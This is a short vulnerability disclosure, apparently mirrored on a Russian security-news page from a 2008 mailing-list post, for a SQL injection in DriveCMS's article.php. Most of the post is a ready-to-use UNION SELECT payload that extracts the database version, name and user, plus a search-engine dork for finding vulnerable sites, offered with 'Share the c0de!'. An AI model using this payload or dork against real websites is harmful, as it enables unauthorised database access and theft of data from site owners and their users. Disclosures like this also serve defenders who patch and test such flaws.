Уведомление о безопасности: DriveCMS article.php remote sql injection

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
  Remote access vulnerability using BigDump ver. 0.29b
  Arab Portal v2.1 Remote File Disclosure (Win32)
  hMAilServer 4.4.2 (PHPWebAdmin)
local & remote file inclusion
  FirmChannel Digital Signage 3.24 Cross-site scripting

From: beenudel1986_(at)_gmail.com <beenudel1986_(at)_gmail.com>
Date: 10 ноября 2008 г.
Subject: DriveCMS article.php remote sql injection

################################################################
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986@gmail.com
#
# Share the c0de!
#
################################################################
#
# Title: DriveCMS Article.php Sql Injection

#
# Vendor: http://drivecms.com

#
#
###########################################################
#
# d0rk:Powered by DriveCMS
#
###########################################################



    Live Demo:
       payload:
/article.php?id=-1+union+select+1,concat(version(),0x3a,
database(),0x3a,user()),3,4,5,6,7,8,9.10,11,12,13,14,15,16,
17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
       Column number can be diffrent too



###########################################################
#
# Bug discovered : 02 Nov.2008
###########################################################

test server